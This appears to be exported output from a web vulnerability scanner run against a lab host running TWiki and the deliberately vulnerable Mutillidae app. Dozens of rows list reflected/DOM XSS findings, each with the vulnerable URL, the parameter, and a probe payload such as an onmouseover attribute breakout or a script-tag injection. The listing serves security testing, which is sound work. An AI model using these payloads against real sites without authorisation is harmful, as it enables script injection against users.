http://192.168.105.200/twiki/bin/oops/TWiki/top?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/top?template=oopsmore¶m1=1.1¶m2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='aWAd(5990)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiTopic?template=oopsmore¶m1=1.5¶m2=1.5 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiTopic?template=oopsmore¶m1=1.5¶m2=1.5 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='Flox(1409)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/TextFormattingRules?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TextFormattingRules?template=oopsmore¶m1=1.1¶m2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='VYHS(9431)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/sit?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/sit?template=oopsmore¶m1=1.1¶m2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='sCPs(7861)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?topicparent=TWiki.TWikiSystemRequirements | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?topicparent=TWiki.TWikiSystemRequirements has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='QzzM(4035)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WikiWikiClonesWTgdervMRixdShSobfKoAkuh?topicparent=TWiki.WikiWikiClonesWTgdervMRixdShSobfKoAkuh | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WikiWikiClonesWTgdervMRixdShSobfKoAkuh?topicparent=TWiki.WikiWikiClonesWTgdervMRixdShSobfKoAkuh has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='QjLv(5485)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/bad?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/bad?template=oopsmore¶m1=1.1¶m2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='VDVU(9666)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?template=oopsmore¶m1=1.12¶m2=1.12 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?template=oopsmore¶m1=1.12¶m2=1.12 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='dial(4055)'bad=" |
http://192.168.105.200/mutillidae/?page=text-file-viewer.php | Target: http://192.168.105.200/mutillidae/?page=text-file-viewer.php has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: page, vulnerabilitypayload:"onmouseover='gUXw(5110)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiSystemRequirements?template=oopsmore¶m1=1.35¶m2=1.35 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiSystemRequirements?template=oopsmore¶m1=1.35¶m2=1.35 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='TntV(1629)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE?template=oopsmore¶m1=1.6¶m2=1.6 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE?template=oopsmore¶m1=1.6¶m2=1.6 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='MZlm(4554)'bad=" |
http://192.168.105.200/twiki/bin/edit/Main/WebSearch?topicparent=Main.WebHome | Target: http://192.168.105.200/twiki/bin/edit/Main/WebSearch?topicparent=Main.WebHome has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='HpnB(8131)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/TWikiSkins?topicparent=TWiki.TWikiSystemRequirements | Target: http://192.168.105.200/twiki/bin/edit/TWiki/TWikiSkins?topicparent=TWiki.TWikiSystemRequirements has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='VoVU(1751)'bad=" |
http://192.168.105.200/mutillidae/?page=add-to-your-blog.php | Target: http://192.168.105.200/mutillidae/?page=add-to-your-blog.php has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: page, vulnerabilitypayload:"onmouseover='lpnO(9182)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/GoodStyle?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/GoodStyle?template=oopsmore¶m1=1.1¶m2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='sbMS(7039)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiNotation?template=oopsmore¶m1=1.3¶m2=1.3 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiNotation?template=oopsmore¶m1=1.3¶m2=1.3 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='xltb(6335)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicViewTemplate?template=oopsmore¶m1=1.6¶m2=1.6 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicViewTemplate?template=oopsmore¶m1=1.6¶m2=1.6 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='YTNk(8918)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/JavaScript?topicparent=TWiki.TWikiSystemRequirements | Target: http://192.168.105.200/twiki/bin/edit/TWiki/JavaScript?topicparent=TWiki.TWikiSystemRequirements has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='ycYf(2421)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsmore¶m1=1.13¶m2=1.13 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhts?template=oopsmore¶m1=1.13¶m2=1.13 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='BdYH(6576)'bad=" |
http://192.168.105.200/twiki/bin/oops/Main/WebStatisticseoqWHqiUWCDa?template=oopsmore¶m1=1.33¶m2=1.33 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebStatisticseoqWHqiUWCDa?template=oopsmore¶m1=1.33¶m2=1.33 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='pZJp(6331)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/AVeryLongTWikiTopicNameIsAlsoPossible?topicparent=TWiki.WikiNotation | Target: http://192.168.105.200/twiki/bin/edit/TWiki/AVeryLongTWikiTopicNameIsAlsoPossible?topicparent=TWiki.WikiNotation has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='xhZI(3986)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/SimultaneousEdits?topicparent=TWiki.MainFeatures | Target: http://192.168.105.200/twiki/bin/edit/TWiki/SimultaneousEdits?topicparent=TWiki.MainFeatures has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='iABL(6212)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/GoodStylebmCSuNsfoYww?template=oopsmore¶m1=1.8¶m2=1.8 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/GoodStylebmCSuNsfoYww?template=oopsmore¶m1=1.8¶m2=1.8 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='cAZV(3809)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiWordzXXHVlcqHCKC?template=oopsmore¶m1=1.10¶m2=1.10 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiWordzXXHVlcqHCKC?template=oopsmore¶m1=1.10¶m2=1.10 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='ySpY(7995)'bad=" |
http://192.168.105.200/twiki/bin/edit/Main/PeterThoeny?topicparent=Main.WebHome | Target: http://192.168.105.200/twiki/bin/edit/Main/PeterThoeny?topicparent=Main.WebHome has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='Zpfk(9499)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/TWikiTemplates?topicparent=TWiki.TWikiSystemRequirements | Target: http://192.168.105.200/twiki/bin/edit/TWiki/TWikiTemplates?topicparent=TWiki.TWikiSystemRequirements has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='kGST(8233)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/YouAreHereswsMZQFRDgCN?t=1595894872&topicparent=3399023886140 | Target: http://192.168.105.200/twiki/bin/edit/TWiki/YouAreHereswsMZQFRDgCN?t=1595894872&topicparent=3399023886140 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='VXnw(5084)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?t=1595894700&topicparent=9113892988903 | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WindowsInstallCookbookQPyVVfTNrWmCfTUVUSfxbHFEwTJlTIUTZhtsSQjEWAZxwfBR?t=1595894700&topicparent=9113892988903 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='wcKY(7942)'bad=" |
http://192.168.105.200/twiki/bin/edit/Test/TestTopic3?topicparent=TWiki.TWikiTutorial | Target: http://192.168.105.200/twiki/bin/edit/Test/TestTopic3?topicparent=TWiki.TWikiTutorial has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='bciC(1443)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiTutorial?template=oopsmore¶m1=1.13¶m2=1.13 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiTutorial?template=oopsmore¶m1=1.13¶m2=1.13 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='MSdo(9700)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?template=oopsmore¶m1=1.7¶m2=1.7 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebTopicNonWikiTemplatelFFzAgbwhaVq?template=oopsmore¶m1=1.7¶m2=1.7 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='qUdy(5462)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/TWikiSkinsqJwHYuIeNWcx?topicparent=TWiki.MainFeatures | Target: http://192.168.105.200/twiki/bin/edit/TWiki/TWikiSkinsqJwHYuIeNWcx?topicparent=TWiki.MainFeatures has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='QQCG(7210)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/bad?t=1595894692&topicparent=3543008140103 | Target: http://192.168.105.200/twiki/bin/edit/TWiki/bad?t=1595894692&topicparent=3543008140103 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='Xman(7281)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE?t=1595894883&topicparent=4428986529524 | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicEditTemplateiCGgrIzcEefnNtsCWGvTdVpE?t=1595894883&topicparent=4428986529524 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='jTKQ(5623)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WebPreferences?template=oopsmore¶m1=1.38¶m2=1.38 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebPreferences?template=oopsmore¶m1=1.38¶m2=1.38 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='NOkX(1910)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?template=oopsmore¶m1=1.42¶m2=1.42 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WelcomeGuestqnNLAFixLaFquPpnlsYVRFCM?template=oopsmore¶m1=1.42¶m2=1.42 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='cYQR(9849)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/NewTopic?topicparent=TWiki.WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU | Target: http://192.168.105.200/twiki/bin/edit/TWiki/NewTopic?topicparent=TWiki.WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='UKwi(8200)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/TWikiPlugins?topicparent=TWiki.TWikiSystemRequirements | Target: http://192.168.105.200/twiki/bin/edit/TWiki/TWikiPlugins?topicparent=TWiki.TWikiSystemRequirements has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='seKg(8132)'bad=" |
http://192.168.105.200/mutillidae/index.php?page=password-generator.php&username=anonymous | Target: http://192.168.105.200/mutillidae/index.php?page=password-generator.php&username=anonymous has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: username, vulnerabilitypayload:2730*/():;8017 |
http://192.168.105.200/twiki/bin/edit/Sandbox/TestTopic3?topicparent=TWiki.TWikiTutorial | Target: http://192.168.105.200/twiki/bin/edit/Sandbox/TestTopic3?topicparent=TWiki.TWikiTutorial has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='hHwb(8895)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WikiWord?topicparent=TWiki.WikiName | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WikiWord?topicparent=TWiki.WikiName has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='oSgi(5904)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WebRss?topicparent=TWiki.WebRssBasepqdJdCubYLBE | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WebRss?topicparent=TWiki.WebRssBasepqdJdCubYLBE has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='UyJo(9996)'bad=" |
http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=home.php | Target: http://192.168.105.200/mutillidae/index.php?do=toggle-security&page=home.php has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: page, vulnerabilitypayload:"onmouseover='qbfZ(3151)'bad=" |
http://192.168.105.200/mutillidae/index.php?page=home.php | Target: http://192.168.105.200/mutillidae/index.php?page=home.php has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: page, vulnerabilitypayload:"onmouseover='pxft(9251)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiWikiClonesWTgdervMRixdShSobfKoAkuh?template=oopsmore¶m1=1.6¶m2=1.6 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiWikiClonesWTgdervMRixdShSobfKoAkuh?template=oopsmore¶m1=1.6¶m2=1.6 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='uoPe(4619)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/MainFeatures?template=oopsmore¶m1=1.13¶m2=1.13 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/MainFeatures?template=oopsmore¶m1=1.13¶m2=1.13 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='gLxV(2864)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRssgFJiGmbjzLvK?template=oopsmore¶m1=1.2¶m2=1.2 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRssgFJiGmbjzLvK?template=oopsmore¶m1=1.2¶m2=1.2 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='ZMdq(7895)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/Bad?topicparent=TWiki.bad | Target: http://192.168.105.200/twiki/bin/edit/TWiki/Bad?topicparent=TWiki.bad has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='QlWz(8267)'bad=" |
http://192.168.105.200/mutillidae/index.php?page=captured-data.php | Target: http://192.168.105.200/mutillidae/index.php?page=captured-data.php has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: page, vulnerabilitypayload:"onmouseover='CeJS(6430)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WindowsInstallCookbook?topicparent=TWiki.TWikiSystemRequirements | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WindowsInstallCookbook?topicparent=TWiki.TWikiSystemRequirements has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='BAGH(3336)'bad=" |
http://192.168.105.200/twiki/bin/edit/Main/WebStatisticseoqWHqiUWCDa?t=1595894699&topicparent=2121092733961 | Target: http://192.168.105.200/twiki/bin/edit/Main/WebStatisticseoqWHqiUWCDa?t=1595894699&topicparent=2121092733961 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='hhUv(3920)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/TWikiSystemRequirements?t=1595894774&topicparent=3624168514383 | Target: http://192.168.105.200/twiki/bin/edit/TWiki/TWikiSystemRequirements?t=1595894774&topicparent=3624168514383 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='OYsf(5872)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WikiName?template=oopsmore¶m1=1.3¶m2=1.3 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WikiName?template=oopsmore¶m1=1.3¶m2=1.3 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='PvBK(7846)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/TWikiPluginszAOpGaKKTRsS?topicparent=TWiki.TWikiSystemRequirements | Target: http://192.168.105.200/twiki/bin/edit/TWiki/TWikiPluginszAOpGaKKTRsS?topicparent=TWiki.TWikiSystemRequirements has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='hUsL(8843)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/FileAttachment?topicparent=TWiki.TWikiSystemRequirements | Target: http://192.168.105.200/twiki/bin/edit/TWiki/FileAttachment?topicparent=TWiki.TWikiSystemRequirements has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='SOid(1834)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/whether?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/whether?template=oopsmore¶m1=1.1¶m2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='WISF(5898)'bad=" |
http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsmore¶m1=1.1¶m2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='DdrR(9224)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WikiWikiClonesWTgdervMRixdShSobfKoAkuh?t=1595894964&topicparent=8604613835626 | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WikiWikiClonesWTgdervMRixdShSobfKoAkuh?t=1595894964&topicparent=8604613835626 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='yCbE(8644)'bad=" |
http://192.168.105.200/twiki/bin/oops/Main/TWikiAdminGroup?template=oopsmore¶m1=1.20¶m2=1.20 | Target: http://192.168.105.200/twiki/bin/oops/Main/TWikiAdminGroup?template=oopsmore¶m1=1.20¶m2=1.20 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='Hsqa(8711)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WebRssgFJiGmbjzLvK?t=1595894922&topicparent=0277026118457 | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WebRssgFJiGmbjzLvK?t=1595894922&topicparent=0277026118457 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='uAzz(9136)'bad=" |
http://192.168.105.200/twiki/bin/oops/Main/WebHomeoUiOyhwtrYHibJggYyZwaerd?template=oopsmore¶m1=1.24¶m2=1.24 | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHomeoUiOyhwtrYHibJggYyZwaerd?template=oopsmore¶m1=1.24¶m2=1.24 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='tiQU(3083)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WebRssBasepqdJdCubYLBE?template=oopsmore¶m1=1.4¶m2=1.4 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebRssBasepqdJdCubYLBE?template=oopsmore¶m1=1.4¶m2=1.4 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='iFJK(9156)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WindowsInstallCookbookQPyVVfTNrWmC?topicparent=TWiki.TWikiSystemRequirements | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WindowsInstallCookbookQPyVVfTNrWmC?topicparent=TWiki.TWikiSystemRequirements has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='erMb(8113)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WIKILOGOIMG?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WIKILOGOIMG?template=oopsmore¶m1=1.1¶m2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='djZh(6990)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WikiWordzXXHVlcqHCKC?t=1595894703&topicparent=6550651805478 | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WikiWordzXXHVlcqHCKC?t=1595894703&topicparent=6550651805478 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='fdTC(3813)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WebHome?topicparent=TWiki.WebTopicViewTemplate | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WebHome?topicparent=TWiki.WebTopicViewTemplate has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='IMyh(7102)'bad=" |
http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup | Target: http://192.168.105.200/twiki/bin/oops/Main/WebHome?template=oopsaccessgroup¶m1=Main.TWikiAdminGroup has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param1, vulnerabilitypayload:<ScRiPt >AtVH(7370)</ScRiPt> |
http://192.168.105.200/mutillidae/?page=show-log.php | Target: http://192.168.105.200/mutillidae/?page=show-log.php has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: page, vulnerabilitypayload:"onmouseover='ZDul(1654)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/WebHomeaAiLtumIynHm?template=oopsmore¶m1=1.121¶m2=1.121 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/WebHomeaAiLtumIynHm?template=oopsmore¶m1=1.121¶m2=1.121 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='ocyo(2010)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicList?t=1595894707&topicparent=8108477134234 | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WebTopicList?t=1595894707&topicparent=8108477134234 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='anvY(4813)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/TWikiUpgradeGuide?topicparent=TWiki.WebHomeaAiLtumIynHm | Target: http://192.168.105.200/twiki/bin/edit/TWiki/TWikiUpgradeGuide?topicparent=TWiki.WebHomeaAiLtumIynHm has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='YwIN(2072)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/WebRssBasepqdJdCubYLBE?t=1595894890&topicparent=0712104769119 | Target: http://192.168.105.200/twiki/bin/edit/TWiki/WebRssBasepqdJdCubYLBE?t=1595894890&topicparent=0712104769119 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='blph(8951)'bad=" |
http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPreferencesoWuBVEKVgQrg?template=oopsmore¶m1=1.54¶m2=1.54 | Target: http://192.168.105.200/twiki/bin/oops/TWiki/TWikiPreferencesoWuBVEKVgQrg?template=oopsmore¶m1=1.54¶m2=1.54 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='XrtI(9115)'bad=" |
http://192.168.105.200/twiki/bin/edit/TWiki/FreshTopic?topicparent=TWiki.WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU | Target: http://192.168.105.200/twiki/bin/edit/TWiki/FreshTopic?topicparent=TWiki.WikiSyntaxzZCcGwUsIOEXJrxLzSaAuvSU has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='Ocvu(1851)'bad=" |
http://192.168.105.200/twiki/bin/edit/Main/TWikiGroups?topicparent=Main.WebSearch | Target: http://192.168.105.200/twiki/bin/edit/Main/TWikiGroups?topicparent=Main.WebSearch has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: topicparent, vulnerabilitypayload:"onmouseover='kapU(5967)'bad=" |
http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOIMG?template=oopsmore¶m1=1.1¶m2=1.1 | Target: http://192.168.105.200/twiki/bin/oops/Main/WIKILOGOIMG?template=oopsmore¶m1=1.1¶m2=1.1 has DOM Cross-Station Script Attack Vulnerability (XSS), vulnerability parameter: param2, vulnerabilitypayload:"onmouseover='Cshr(9544)'bad=" |
# | Reference |
---|---|
1 | https://www.owasp.org/index.php/Reflected_DOM_Injection |
